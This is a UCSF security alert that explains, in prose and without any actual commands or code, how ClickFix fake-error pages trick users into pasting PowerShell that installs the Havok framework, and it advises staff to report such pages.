Threat Alert: ClickFix Attacks Trick People Into Following Commands that Install Malware

• ClickFix is a social-engineering tactic where threat actors create websites or phishing attachments that display fake errors and then prompt the user to click a button to fix them.  It has become increasingly popular among cybercriminals, who use it to deploy various malware.
• For example, threat actors send emails or put messages on websites with "restricted notice" or another message that prompts the users to download an HTML or other document.
• When the user opens the document, an error message appears, and the user is told to fix the error by updating the DNS cache manually or performing other tasks. It also contains a button that says "how to fix" or other message.
• Clicking on the button will automatically copy a PowerShell command to the Windows clipboard and then displays instructions on the command that must be entered to perform the task (e.g., "Contol+V" & "Enter"). 
• The command attempts to launch another PowerShell script hosted on the threat actor's SharePoint Server.
• It checks if your device is a sandbox and modifies the Windows Registry to add a value indicating that the script was run on the device. 
• It will then proceed to check if Python is installed on the device and, if not, install the interpreter.
• Finally, a Python script is downloaded from the same SharePoint site and executed to deploy Havok, an open-source post-exploitation framework that allows attackers to breach the network.

Key Action: Stay Alert!

• UCSF will never ask you to perform commands in an email or on a website.
• Be wary of error messages on unexpected websites or apps.
• Keep your software and OS updated to prevent malware exploits.
• Close all browser windows and clear the clipboard because it likely contains an executable command.
• If you visit a site where you are presented with a fake error message, take a screenshot and report it to the UCSF Service Desk.